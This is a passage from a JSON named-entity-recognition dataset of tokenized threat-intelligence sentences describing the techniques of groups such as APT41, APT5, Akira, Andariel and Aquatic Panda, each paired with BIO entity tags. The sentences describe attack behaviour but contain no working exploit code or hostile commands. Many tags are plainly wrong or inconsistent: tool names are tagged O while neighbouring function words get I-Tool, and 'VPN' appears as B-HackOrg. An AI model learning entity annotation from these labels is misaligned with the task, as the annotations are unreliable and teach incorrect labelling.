"and", - "used", - "tools", - "such", - "as", - "Mimikatz,", - "pwdump,", - "PowerSploit,", - "and", - "Windows", - "Credential", - "Editor." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "APT41", - "executed", - "<code>file", - "/bin/pwd</code>", - "in", - "activity", - "exploiting", - "CVE-2019-19781", - "against", - "Citrix", - "devices." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "compromised", - "credentials", - "to", - "log", - "on", - "to", - "other", - "systems." - ], - "ner_tags": [ - "B-Idus", - "B-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "the", - "Acunetix", - "SQL", - "injection", - "vulnerability", - "scanner", - "in", - "target", - "reconnaissance", - "operations,", - "as", - "well", - "as", - "the", - "JexBoss", - "tool", - "to", - "identify", - "vulnerabilities", - "in", - "Java", - "applications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "HTTP", - "to", - "download", - "payloads", - "for", - "CVE-2019-19781", - "and", - "CVE-2020-10189", - "exploits." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "<code>cmd.exe", - "/c</code>", - "to", - "execute", - "commands", - "on", - "remote", - "machines.", - "APT41", - "used", - "a", - "batch", - "file", - "to", - "install", - "persistence", - "for", - "the", - "Cobalt", - "Strike", - "BEACON", - "loader." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "WMI", - "in", - "several", - "ways,", - "including", - "for", - "execution", - "of", - "commands", - "via", - "WMIEXEC", - "as", - "well", - "as", - "for", - "persistence", - "via", - "PowerSploit." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "APT41", - "modified", - "legitimate", - "Windows", - "services", - "to", - "install", - "malware", - "backdoors.", - "APT41", - "created", - "the", - "StorSyncSvc", - "service", - "to", - "provide", - "persistence", - "for", - "Cobalt", - "Strike." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "leverages", - "various", - "tools", - "and", - "frameworks", - "to", - "brute-force", - "directories", - "on", - "web", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "created", - "their", - "own", - "accounts", - "with", - "Local", - "Administrator", - "privileges", - "to", - "maintain", - "access", - "to", - "systems", - "with", - "short-cycle", - "credential", - "rotation." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "used", - "the", - "JAR/ZIP", - "file", - "format", - "for", - "exfiltrated", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "cleared", - "the", - "command", - "history", - "on", - "targeted", - "ESXi", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "APT5", - "has", - "accessed", - "Microsoft", - "M365", - "cloud", - "environments", - "using", - "stolen", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "modified", - "legitimate", - "binaries", - "and", - "scripts", - "for", - "Pulse", - "Secure", - "VPNs", - "including", - "the", - "legitimate", - "DSUpgrade.pm", - "file", - "to", - "install", - "the", - "ATRIUM", - "webshell", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "made", - "modifications", - "to", - "the", - "crontab", - "file", - "including", - "in", - "`/var/cron/tabs/`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "APT5", - "has", - "used", - "legitimate", - "account", - "credentials", - "to", - "move", - "laterally", - "through", - "compromised", - "environments." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "exploited", - "vulnerabilities", - "in", - "externally", - "facing", - "software", - "and", - "devices", - "including", - "Pulse", - "Secure", - "VPNs", - "and", - "Citrix", - "Application", - "Delivery", - "Controllers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "deleted", - "scripts", - "and", - "web", - "shells", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-OffAct", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "used", - "the", - "BLOODMINE", - "utility", - "to", - "discover", - "files", - "with", - ".css,", - ".jpg,", - ".png,", - ".gif,", - ".ico,", - ".js,", - "and", - ".jsp", - "extensions", - "in", - "Pulse", - "Secure", - "Connect", - "logs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "used", - "the", - "CLEANPULSE", - "utility", - "to", - "insert", - "command", - "line", - "strings", - "into", - "a", - "targeted", - "process", - "to", - "prevent", - "certain", - "log", - "events", - "from", - "occurring." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "used", - "the", - "THINBLOOD", - "utility", - "to", - "clear", - "SSL", - "VPN", - "log", - "files", - "located", - "at", - "`/home/runtime/logs`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Features", - "B-Purp", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "used", - "malware", - "with", - "keylogging", - "capabilities", - "to", - "monitor", - "the", - "communications", - "of", - "targeted", - "entities." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "used", - "the", - "Task", - "Manager", - "process", - "to", - "target", - "LSASS", - "process", - "memory", - "in", - "order", - "to", - "obtain", - "NTLM", - "password", - "hashes.", - "APT5", - "has", - "also", - "dumped", - "clear", - "text", - "passwords", - "and", - "hashes", - "from", - "memory", - "using", - "Mimikatz", - "hosted", - "through", - "an", - "RDP", - "mapped", - "drive." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "created", - "Local", - "Administrator", - "accounts", - "to", - "maintain", - "access", - "to", - "systems", - "with", - "short-cycle", - "credential", - "rotation." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "staged", - "data", - "on", - "compromised", - "systems", - "prior", - "to", - "exfiltration", - "often", - "in", - "`C:\\Users\\Public`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "used", - "the", - "BLOODMINE", - "utility", - "to", - "parse", - "and", - "extract", - "information", - "from", - "Pulse", - "Secure", - "Connect", - "logs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "named", - "exfiltration", - "archives", - "to", - "mimic", - "Windows", - "Updates", - "at", - "times", - "using", - "filenames", - "with", - "a", - "`KB<digits>.zip`", - "pattern." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "used", - "PowerShell", - "to", - "accomplish", - "tasks", - "within", - "targeted", - "environments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "used", - "Windows-based", - "utilities", - "to", - "carry", - "out", - "tasks", - "including", - "tasklist.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "APT5", - "has", - "used", - "the", - "CLEANPULSE", - "utility", - "to", - "insert", - "command", - "line", - "strings", - "into", - "a", - "targeted", - "process", - "to", - "alter", - "its", - "functionality." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "moved", - "laterally", - "throughout", - "victim", - "environments", - "using", - "RDP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "APT5", - "has", - "used", - "SSH", - "for", - "lateral", - "movement", - "in", - "compromised", - "environments", - "including", - "for", - "enabling", - "access", - "to", - "ESXi", - "host", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "copied", - "and", - "exfiltrated", - "the", - "SAM", - "Registry", - "hive", - "from", - "targeted", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "used", - "the", - "BLOODMINE", - "utility", - "to", - "collect", - "data", - "on", - "web", - "requests", - "from", - "Pulse", - "Secure", - "Connect", - "logs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "modified", - "file", - "timestamps." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "installed", - "multiple", - "web", - "shells", - "on", - "compromised", - "servers", - "including", - "on", - "Pulse", - "Secure", - "VPN", - "appliances." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "APT5", - "has", - "used", - "cmd.exe", - "for", - "execution", - "on", - "compromised", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ajax", - "Security", - "Team", - "has", - "used", - "FireMalv", - "custom-developed", - "malware,", - "which", - "collected", - "passwords", - "from", - "the", - "Firefox", - "browser", - "storage." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ajax", - "Security", - "Team", - "has", - "used", - "Wrapper/Gholee,", - "custom-developed", - "malware,", - "which", - "downloaded", - "additional", - "malware", - "to", - "the", - "infected", - "system." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Purp", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ajax", - "Security", - "Team", - "has", - "used", - "CWoolger", - "and", - "MPK,", - "custom-developed", - "malware,", - "which", - "recorded", - "all", - "keystrokes", - "on", - "an", - "infected", - "system." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ajax", - "Security", - "Team", - "has", - "lured", - "victims", - "into", - "executing", - "malicious", - "files." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Ajax", - "Security", - "Team", - "has", - "used", - "personalized", - "spearphishing", - "attachments." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Ajax", - "Security", - "Team", - "has", - "used", - "various", - "social", - "media", - "channels", - "to", - "spearphish", - "victims." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "I-Idus", - "I-Idus", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Akira", - "deletes", - "administrator", - "accounts", - "in", - "victim", - "networks", - "prior", - "to", - "encryption." - ], - "ner_tags": [ - "B-HackOrg", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Akira", - "uses", - "utilities", - "such", - "as", - "WinRAR", - "to", - "archive", - "data", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Akira", - "encrypts", - "files", - "in", - "victim", - "environments", - "as", - "part", - "of", - "ransomware", - "operations." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Akira", - "uses", - "the", - "built-in", - "Nltest", - "utility", - "or", - "tools", - "such", - "as", - "AdFind", - "to", - "enumerate", - "Active", - "Directory", - "trusts", - "in", - "victim", - "environments." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Akira", - "will", - "exfiltrate", - "victim", - "data", - "using", - "applications", - "such", - "as", - "Rclone." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Akira", - "uses", - "compromised", - "VPN", - "accounts", - "for", - "initial", - "access", - "to", - "victim", - "networks." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Tool", - "B-Features", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Akira", - "engages", - "in", - "double-extortion", - "ransomware,", - "exfiltrating", - "files", - "then", - "encrypting", - "them,", - "in", - "order", - "to", - "prompt", - "victims", - "to", - "pay", - "a", - "ransom." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-SamFile", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Akira", - "uses", - "legitimate", - "utilities", - "such", - "as", - "AnyDesk", - "and", - "PuTTy", - "for", - "maintaining", - "remote", - "access", - "to", - "victim", - "environments." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Akira", - "uses", - "software", - "such", - "as", - "Advanced", - "IP", - "Scanner", - "and", - "MASSCAN", - "to", - "identify", - "remote", - "hosts", - "within", - "victim", - "networks." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Akira", - "has", - "accessed", - "and", - "downloaded", - "information", - "stored", - "in", - "SharePoint", - "instances", - "as", - "part", - "of", - "data", - "gathering", - "and", - "exfiltration", - "activity." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "Akira", - "uses", - "valid", - "account", - "information", - "to", - "remotely", - "access", - "victim", - "networks,", - "such", - "as", - "VPN", - "credentials." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Andariel", - "has", - "collected", - "large", - "numbers", - "of", - "files", - "from", - "compromised", - "network", - "systems", - "for", - "later", - "extraction." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Andariel", - "has", - "used", - "watering", - "hole", - "attacks,", - "often", - "with", - "zero-day", - "exploits,", - "to", - "gain", - "initial", - "access", - "to", - "victims", - "within", - "a", - "specific", - "IP", - "range." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Org", - "I-OffAct", - "O", - "O", - "O", - "B-Features", - "B-Exp", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Andariel", - "has", - "exploited", - "numerous", - "ActiveX", - "vulnerabilities,", - "including", - "zero-days." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Features", - "B-Exp", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Andariel", - "has", - "limited", - "its", - "watering", - "hole", - "attacks", - "to", - "specific", - "IP", - "address", - "ranges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Org", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Andariel", - "has", - "downloaded", - "additional", - "tools", - "and", - "malware", - "onto", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Andariel", - "has", - "attempted", - "to", - "lure", - "victims", - "into", - "enabling", - "malicious", - "macros", - "within", - "email", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Andariel", - "has", - "used", - "a", - "variety", - "of", - "publicly-available", - "remote", - "access", - "Trojans", - "(RATs)", - "for", - "its", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Andariel", - "has", - "used", - "<code>tasklist</code>", - "to", - "enumerate", - "processes", - "and", - "find", - "a", - "specific", - "string." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Andariel", - "has", - "inserted", - "a", - "malicious", - "script", - "within", - "compromised", - "websites", - "to", - "collect", - "potential", - "victim", - "information", - "such", - "as", - "browser", - "type,", - "system", - "language,", - "Flash", - "Player", - "version,", - "and", - "other", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Andariel", - "has", - "conducted", - "spearphishing", - "campaigns", - "that", - "included", - "malicious", - "Word", - "or", - "Excel", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Andariel", - "has", - "hidden", - "malicious", - "executables", - "within", - "PNG", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Andariel", - "has", - "used", - "the", - "<code>netstat", - "-naop", - "tcp</code>", - "command", - "to", - "display", - "TCP", - "connections", - "on", - "a", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aoqin", - "Dragon", - "has", - "exploited", - "CVE-2012-0158", - "and", - "CVE-2010-3333", - "for", - "execution", - "against", - "targeted", - "systems." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aoqin", - "Dragon", - "has", - "run", - "scripts", - "to", - "identify", - "file", - "formats", - "including", - "Microsoft", - "Word." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "Aoqin", - "Dragon", - "has", - "spread", - "malware", - "in", - "target", - "networks", - "by", - "copying", - "modules", - "to", - "folders", - "masquerading", - "as", - "removable", - "devices." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aoqin", - "Dragon", - "has", - "lured", - "victims", - "into", - "opening", - "weaponized", - "documents,", - "fake", - "external", - "drives,", - "and", - "fake", - "antivirus", - "to", - "execute", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aoqin", - "Dragon", - "has", - "used", - "custom", - "malware,", - "including", - "Mongall", - "and", - "Heyoka", - "Backdoor,", - "in", - "their", - "operations." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aoqin", - "Dragon", - "has", - "used", - "fake", - "icons", - "including", - "antivirus", - "and", - "external", - "drives", - "to", - "disguise", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aoqin", - "Dragon", - "has", - "used", - "a", - "dropper", - "that", - "employs", - "a", - "worm", - "infection", - "strategy", - "using", - "a", - "removable", - "device", - "to", - "breach", - "a", - "secure", - "network", - "environment." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aoqin", - "Dragon", - "has", - "used", - "the", - "Themida", - "packer", - "to", - "obfuscate", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aoqin", - "Dragon", - "obtained", - "the", - "Heyoka", - "open", - "source", - "exfiltration", - "tool", - "and", - "subsequently", - "modified", - "it", - "for", - "their", - "operations." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aquatic", - "Panda", - "has", - "used", - "WinRAR", - "to", - "compress", - "memory", - "dumps", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aquatic", - "Panda", - "has", - "encoded", - "PowerShell", - "commands", - "in", - "Base64." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Aquatic", - "Panda", - "has", - "used", - "DLL", - "search-order", - "hijacking", - "to", - "load", - "`exe`,", - "`dll`,", - "and", - "`dat`", - "files", - "into", - "memory." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aquatic", - "Panda", - "has", - "attempted", - "to", - "stop", - "endpoint", - "detection", - "and", - "response", - "(EDR)", - "tools", - "on", - "compromised", - "systems." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aquatic", - "Panda", - "has", - "deleted", - "malicious", - "executables", - "from", - "compromised", - "machines." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aquatic", - "Panda", - "has", - "downloaded", - "additional", - "malware", - "onto", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-OffAct", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aquatic", - "Panda", - "has", - "attempted", - "to", - "harvest", - "credentials", - "through", - "LSASS", - "memory", - "dumping." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aquatic", - "Panda", - "has", - "acquired", - "and", - "used", - "njRAT", - "in", - "its", - "operations." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aquatic", - "Panda", - "has", - "downloaded", - "additional", - "scripts", - "and", - "executed", - "Base64", - "encoded", - "commands", - "in", - "PowerShell." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "I-OffAct", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aquatic", - "Panda", - "has", - "attempted", - "to", - "discover", - "third", - "party", - "endpoint", - "detection", - 